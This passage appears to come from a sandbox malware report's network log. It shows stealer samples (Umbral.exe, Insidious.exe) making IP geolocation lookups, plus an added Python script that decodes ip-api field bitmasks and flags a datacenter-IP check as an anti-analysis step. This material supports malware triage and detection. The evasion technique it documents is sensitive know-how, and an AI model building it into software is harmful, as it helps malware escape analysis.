                                      Sep 7, 2024 01:49:09.452181101 CEST | 378 bytes | IN | HTTP/1.1 200 OK
                                      Date: Fri, 06 Sep 2024 23:49:09 GMT
                                      Content-Type: application/json; charset=utf-8
                                      Content-Length: 202
                                      Access-Control-Allow-Origin: *
                                      X-Ttl: 1
                                      X-Rl: 35
                                      Data Raw: 7b 22 73 74 61 74 75 73 22 3a 22 73 75 63 63 65 73 73 22 2c 22 63 6f 75 6e 74 72 79 22 3a 22 55 6e 69 74 65 64 20 53 74 61 74 65 73 22 2c 22 72 65 67 69 6f 6e 4e 61 6d 65 22 3a 22 4e 65 77 20 59 6f 72 6b 22 2c 22 74 69 6d 65 7a 6f 6e 65 22 3a 22 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 22 2c 22 72 65 76 65 72 73 65 22 3a 22 73 74 61 74 69 63 2d 63 70 65 2d 38 2d 34 36 2d 31 32 33 2d 33 33 2e 63 65 6e 74 75 72 79 6c 69 6e 6b 2e 63 6f 6d 22 2c 22 6d 6f 62 69 6c 65 22 3a 66 61 6c 73 65 2c 22 70 72 6f 78 79 22 3a 66 61 6c 73 65 2c 22 71 75 65 72 79 22 3a 22 38 2e 34 36 2e 31 32 33 2e 33 33 22 7d
                                      Data Ascii: {"status":"success","country":"United States","regionName":"New York","timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com","mobile":false,"proxy":false,"query":"8.46.123.33"}


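Added example (editorial code, not part of the Joe Sandbox report and not code from any of the detected families): a small Python triage script for the ip-api.com lookups recorded in the Umbral.exe sessions above. The stealer makes two kinds of request: a bare `GET /line/?fields=hosting` whose plain-text `true`/`false` answer says whether the egress IP belongs to a datacenter or colocation provider (the behaviour behind the "Check if machine is in data center or colocation facility" signature), and `GET /json/?fields=225545`, where the number is ip-api's numeric field bitmask. The script decodes that bitmask with ip-api.com's documented field codes (assumption: the code table below is taken from the public ip-api.com API documentation; the script cross-checks it against the keys of the JSON body the service actually returned in the capture) and flags which lookups fingerprint the environment rather than merely geolocate it. The sample sessions, including the Insidious.exe request to freegeoip.app, are transcribed from the report.

```python
# Added example, not part of the Joe Sandbox report: decode ip-api.com lookups
# from captured HTTP sessions and flag the anti-analysis "hosting" check.
import json
from urllib.parse import parse_qs, urlsplit

# ip-api.com numeric field codes (assumption: values as published in the
# ip-api.com JSON API documentation). The decomposition of 225545 is
# cross-checked below against the keys of the JSON body the service returned.
IP_API_FIELDS = {
    "country": 1, "countryCode": 2, "region": 4, "regionName": 8,
    "city": 16, "zip": 32, "lat": 64, "lon": 128, "timezone": 256,
    "isp": 512, "org": 1024, "as": 2048, "reverse": 4096, "query": 8192,
    "status": 16384, "message": 32768, "mobile": 65536, "proxy": 131072,
    "district": 524288, "continent": 1048576, "continentCode": 2097152,
    "asname": 4194304, "currency": 8388608, "hosting": 16777216,
    "offset": 33554432,
}

# Fields that describe the network environment rather than the location.
ENV_FIELDS = {"hosting", "proxy", "mobile"}


def decode_fields(mask: int) -> list[str]:
    """Expand a numeric ip-api 'fields' bitmask into field names (ascending bit order)."""
    names = []
    for name, bit in sorted(IP_API_FIELDS.items(), key=lambda kv: kv[1]):
        if mask & bit:
            names.append(name)
            mask &= ~bit
    if mask:
        raise ValueError(f"unknown bits in ip-api fields mask: {mask:#x}")
    return names


def requested_fields(request_line: str, host: str) -> list[str]:
    """Fields asked for by a request line such as 'GET /json/?fields=225545 HTTP/1.1'.

    ip-api accepts either a comma-separated list of names or the numeric bitmask;
    both forms occur in the capture. Returns [] for hosts other than ip-api.com.
    """
    if host.lower() != "ip-api.com":
        return []
    _method, target, _version = request_line.split(" ", 2)
    raw = parse_qs(urlsplit(target).query).get("fields", [""])[0]
    if not raw:
        return []  # no 'fields' parameter: ip-api's default field set, not decoded here
    if raw.isdigit():
        return decode_fields(int(raw))
    return raw.split(",")


def mask_matches_response(mask: int, body: str) -> bool:
    """True if the JSON body contains exactly the fields the bitmask requested."""
    return set(decode_fields(mask)) == set(json.loads(body))


def triage_session(process: str, request_line: str, host: str) -> dict:
    """One finding per HTTP session: what was looked up and whether it is an environment check.

    'sandbox_check' is set only for the bare hosting lookup: a single yes/no
    question ("is this IP in a datacenter?") with nothing else requested.
    """
    fields = requested_fields(request_line, host)
    return {
        "process": process,
        "host": host,
        "fields": fields,
        "env_fields": sorted(ENV_FIELDS & set(fields)),
        "sandbox_check": fields == ["hosting"],
    }


# Constructed from the sessions in the report (process, request line, Host header).
CAPTURED_SESSIONS = [
    (r"C:\Users\user\AppData\Local\Temp\Umbral.exe", "GET /line/?fields=hosting HTTP/1.1", "ip-api.com"),
    (r"C:\Users\user\AppData\Local\Temp\Umbral.exe", "GET /json/?fields=225545 HTTP/1.1", "ip-api.com"),
    (r"C:\Users\user\AppData\Local\Temp\Insidious.exe", "GET /xml/ HTTP/1.1", "freegeoip.app"),
]

# JSON body returned for fields=225545 in the report.
CAPTURED_JSON = (
    '{"status":"success","country":"United States","regionName":"New York",'
    '"timezone":"America/New_York","reverse":"static-cpe-8-46-123-33.centurylink.com",'
    '"mobile":false,"proxy":false,"query":"8.46.123.33"}'
)


def findings() -> list[dict]:
    """Triage every captured session."""
    return [triage_session(*s) for s in CAPTURED_SESSIONS]


if __name__ == "__main__":
    for finding in findings():
        print(finding)
    print("fields=225545 decodes to:", decode_fields(225545))
    print("bitmask matches response keys:", mask_matches_response(225545, CAPTURED_JSON))
```

On a live capture, feed `triage_session` the process name, request line and Host header of each HTTP session. Note that ip-api answered `false` to the hosting query in every session above, i.e. the sandbox's egress IP was not classified as hosting; an analysis network whose egress IP is classified as a datacenter would answer `true` to the same query.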
                                      Session ID 0 | Source 192.168.2.5:49705 | Destination 188.114.97.3:443 | PID 5340 | Process C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:47:05 UTC | 67 bytes | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:05 UTC | 647 bytes | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:05 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:05 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=2WNTrXfvGxijmU8opH%2BCG%2BxzqOqWQPNByqWoYW2UkYqm9hVm%2BkLrp1bUMN7JqYTf6UonhsEnOLXVi67WOiuXPR5LchbZ%2B6Fl1kj%2BR5xvC42a%2ByMzWF%2FdiepAQYXbMAhJ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2579618098c4e-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:05 UTC | 167 bytes | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID 1 | Source 192.168.2.5:49707 | Destination 104.21.85.189:443 | PID 5340 | Process C:\Users\user\AppData\Local\Temp\Insidious.exe
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:47:06 UTC | 64 bytes | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:06 UTC | 737 bytes | IN | HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:06 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 30232
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VQZB0JK42WEQKAE0QYVXS
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=OGH9z3Oazcl8kTG3xkdmnqlu%2FbyjJ36%2FtKPgCmbObjnXq2fnPeaPaifCz41PpWbhSFxirjyVnXve7fqxFEiJryUsS7c7nVNxOkXHOMTevgpDRZmTmxt%2FR%2FGiid1P"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2579bac7ac331-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:06 UTC | 632 bytes | IN | Data Raw: 63 30 39 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 20 20 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 6d 61 78 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2e 30 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0a 0a 20 20 20 20 3c 74 69 74 6c 65 3e 50 61 67 65 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d
                                      Data Ascii: c09<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:06 UTC | 1369 bytes | IN | Data Raw: 6e 67 3a 20 30 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 68 31 20 7b 0a 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0a 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 32 70 78 3b 0a 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 32 34 70 78 3b 0a 20 20 20 20 7d 0a 0a 20 20 20 20 2e 6d 61 69 6e 20 7b 0a 20 20 20 20 20 20 70 6f 73 69 74 69 6f 6e 3a 20 72 65 6c 61 74 69 76 65 3b 0a 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 66 6c 65 78 3b 0a 20 20 20 20 20 20 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 20 63 6f 6c 75 6d 6e 3b 0a 20 20 20 20 20 20 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 6a 75 73 74 69 66 79 2d 63 6f 6e 74 65 6e 74 3a 20 63 65 6e 74 65 72 3b 0a 20 20 20 20 20 20 68 65 69 67 68 74 3a
                                      Data Ascii: ng: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:47:06 UTC | 1087 bytes | IN | Data Raw: 20 20 20 20 3c 70 61 74 68 20 66 69 6c 6c 3d 22 23 30 30 37 30 36 37 22 20 64 3d 22 4d 31 31 2e 39 39 39 38 38 33 36 2c 34 2e 30 39 33 37 30 38 30 33 20 4c 38 2e 35 35 38 30 39 35 31 37 2c 37 2e 34 33 32 39 34 39 35 33 20 43 38 2e 32 33 35 33 31 34 35 39 2c 37 2e 37 34 36 31 31 32 39 38 20 38 2e 32 33 35 33 31 34 35 39 2c 38 2e 32 35 33 38 38 37 33 36 20 38 2e 35 35 38 30 39 35 31 37 2c 38 2e 35 36 36 39 33 37 36 39 20 4c 31 32 2c 31 31 2e 39 30 36 32 39 32 31 20 4c 39 2e 38 34 31 38 37 38 37 31 2c 31 34 20 4c 34 2e 32 34 32 30 38 35 34 34 2c 38 2e 35 36 36 39 33 37 35 31 20 43 33 2e 39 31 39 33 30 34 38 35 2c 38 2e 32 35 33 38 38 37 31 39 20 33 2e 39 31 39 33 30 34 38 35 2c 37 2e 37 34 36 31 31 32 38 31 20 34 2e 32 34 32 30 38 35 34 34 2c 37 2e 34 33 32
                                      Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432
                                      2024-09-06 23:47:06 UTC | 6 bytes | IN | Data Raw: 31 0d 0a 0a 0d 0a
                                      Data Ascii: 1
                                      2024-09-06 23:47:06 UTC | 5 bytes | IN | Data Raw: 30 0d 0a 0d 0a
                                      Data Ascii: 0


                                      Session ID 2 | Source 192.168.2.5:49715 | Destination 188.114.97.3:443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:47:21 UTC | 67 bytes | OUT | GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:21 UTC | 635 bytes | IN | HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:21 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:21 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=d81diPdFWJXxNQnm5RkxCZBWPdqJtP5QNNVn3xMlILClnro7dOhPsEXDI4cqMxmRd57nTlNwVWCZjnmB4G8blHlD9Xyj863GqdvFzofDBIk0CW1W3RUIa%2BY7O6hW7W7j"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf257fd29727277-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:21 UTC | 167 bytes | IN | Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                      Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID 3 | Source 192.168.2.5:49716 | Destination 104.21.85.189:443
                                      Timestamp | Bytes transferred | Direction | Data
                                      2024-09-06 23:47:22 UTC | 64 bytes | OUT | GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:22 UTC  734                IN         HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:22 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 0
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; fwd=miss
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VRFEC8WNH5W8D6W334D23
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=mlu64iqkg565SokK38lt2HAqjAxdn0RvPpUwp8SPjOAQvO%2Fs1zq4Nf2JxX669auaw4j02nCq%2ByI3l0Ci8LKqs4Od9CT619XVkOWmGaymh1IZhyrc5I78bByczYx6"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf25802bb2872bc-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:22 UTC  635                IN         Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:22 UTC  1369               IN         Data Ascii: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 10
                                      2024-09-06 23:47:22 UTC  1085               IN         Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.432949
                                      2024-09-06 23:47:22 UTC  5                  IN         Data Ascii: 0


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      4           192.168.2.5  49718        188.114.97.3    443
                                      Timestamp                Bytes transferred  Direction  Data
                                      2024-09-06 23:47:24 UTC  67                 OUT        GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:24 UTC  643                IN         HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:24 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:24 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cHLH5ptsf92bq4oGA9yWlNjg43RPPEwipd90VT7Sm1yXeP5qUjQO2KvE20c%2B%2F778vbdth2YC%2BHXLxd6cJqQ12gt3QSdLkmfwwnqLrnx1D3PdNTt8bpe%2FoNw68a%2FYSVd0"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2580ecc0941d9-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:24 UTC  167                IN         Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      5           192.168.2.5  49719        104.21.85.189   443
                                      Timestamp                Bytes transferred  Direction  Data
                                      2024-09-06 23:47:25 UTC  64                 OUT        GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:25 UTC  736                IN         HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:25 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7649
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VRJ1JENJ0XXRKFJVTF69K
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cYYLk7oTpOnWbR7VjQlNU77WC2L8I%2BuPk0ArvBDJLkWXGA%2FTGQzxBEJ0DeAfFbB%2FiArNtAK8h2f9sV1FwuJV9yqNTgORkx0F0%2BLJM6hq4RMNbQS1WLzjPdTWidIQ"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf258135cb678dc-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:25 UTC  633                IN         Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:25 UTC  1369               IN         Data Ascii: g: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:47:25 UTC  1087               IN         Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.4329
                                      2024-09-06 23:47:25 UTC  5                  IN         Data Ascii: 0


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      6           192.168.2.5  49720        188.114.97.3    443
                                      Timestamp                Bytes transferred  Direction  Data
                                      2024-09-06 23:47:29 UTC  67                 OUT        GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:29 UTC  641                IN         HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:29 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:29 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lpOaR%2BjY92Htl1y99BrjnOAxg2ZmoPr9GXqygz8aQ5n7j0tXdDdKAdFfWsdCp5%2BWK2Bbhsm76U8Gi2YF0HzbA0RlTbbNKLsk2JND8SWue%2F7Tf9%2FrnnBTelWMXyBxiBwo"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2582b1f797cae-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:29 UTC  167                IN         Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      7           192.168.2.5  49721        104.21.85.189   443
                                      Timestamp                Bytes transferred  Direction  Data
                                      2024-09-06 23:47:29 UTC  64                 OUT        GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:29 UTC  729                IN         HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:29 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VRPARXH31AY7RMNNGA7Z5
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nMpa0QTm8d32T2M72n7KvO3daFQnDDi%2BBmJNi6OTMsHAfbYfl0EsAzMVZu9VcWmEaDQi1Z7Sl0hAu30UjMTWnHwm%2FqmfL8o50CuSLdT9DGu8a2neCbu2VSXVzeie"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2582ecfb00f70-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:29 UTC  640                IN         Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:29 UTC  1369               IN         Data Ascii: } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height: 100vh;
                                      2024-09-06 23:47:29 UTC  1080               IN         Data Ascii: h fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.43294936 L9
                                      2024-09-06 23:47:29 UTC  5                  IN         Data Ascii: 0


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      8           192.168.2.5  49722        188.114.97.3    443
                                      Timestamp                Bytes transferred  Direction  Data
                                      2024-09-06 23:47:31 UTC  67                 OUT        GET /xml/ HTTP/1.1
                                      Host: freegeoip.app
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:31 UTC  635                IN         HTTP/1.1 301 Moved Permanently
                                      Date: Fri, 06 Sep 2024 23:47:31 GMT
                                      Content-Type: text/html
                                      Content-Length: 167
                                      Connection: close
                                      Cache-Control: max-age=3600
                                      Expires: Sat, 07 Sep 2024 00:47:31 GMT
                                      Location: https://ipbase.com/xml/
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=nqtAEGt2MAJHzbrm06CHVvTCnJ5RtJ7th6aZe3uThvoE7FyXeUXXcyr248XH9JsgMzLwEnRmu9X%2FTNmThaPmwYUvBw3WaEkIyIlUs5fJe1F5BeF6HcTafjhpwNth0LHP"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2583bfa7843ed-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:31 UTC  167                IN         Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      9           192.168.2.5  49723        104.21.85.189   443
                                      Timestamp                Bytes transferred  Direction  Data
                                      2024-09-06 23:47:32 UTC  64                 OUT        GET /xml/ HTTP/1.1
                                      Host: ipbase.com
                                      Connection: Keep-Alive
                                      2024-09-06 23:47:32 UTC  736                IN         HTTP/1.1 404 Not Found
                                      Date: Fri, 06 Sep 2024 23:47:32 GMT
                                      Content-Type: text/html; charset=utf-8
                                      Transfer-Encoding: chunked
                                      Connection: close
                                      Age: 7656
                                      Cache-Control: public,max-age=0,must-revalidate
                                      Cache-Status: "Netlify Edge"; hit
                                      Vary: Accept-Encoding
                                      X-Nf-Request-Id: 01J74VRS044ASAV2D4YKFE3GMX
                                      CF-Cache-Status: DYNAMIC
                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=83gyU9C9RjNCsGoT%2BwzJkgFws1PoPzAuBPGQw5tzy%2Bq7FTLWZbXGeZzBEY1JkKKbSo8wUxaH%2BQ4Y2LADqhtJ%2BiETdCpwqiXFl3W1wCvLKYUJA8Mz018dRNuEmkNc"}],"group":"cf-nel","max_age":604800}
                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                      Server: cloudflare
                                      CF-RAY: 8bf2583fec8443cd-EWR
                                      alt-svc: h3=":443"; ma=86400
                                      2024-09-06 23:47:32 UTC  633                IN         Data Ascii: c0a<!DOCTYPE html><html> <head> <meta charset="utf-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no"> <title>Page Not Found</title> <link href='https://fonts.googleapis.com
                                      2024-09-06 23:47:32 UTC  1369               IN         Data Ascii: g: 0; } h1 { margin: 0; font-size: 22px; line-height: 24px; } .main { position: relative; display: flex; flex-direction: column; align-items: center; justify-content: center; height:
                                      2024-09-06 23:47:32 UTC  1087               IN         Data Ascii: <path fill="#007067" d="M11.9998836,4.09370803 L8.55809517,7.43294953 C8.23531459,7.74611298 8.23531459,8.25388736 8.55809517,8.56693769 L12,11.9062921 L9.84187871,14 L4.24208544,8.56693751 C3.91930485,8.25388719 3.91930485,7.74611281 4.24208544,7.4329
                                      2024-09-06 23:47:32 UTC  5                  IN         Data Ascii: 0


                                      Session ID  Source IP    Source Port  Destination IP  Destination Port
                                      10          192.168.2.5  49724        188.114.97.3    443
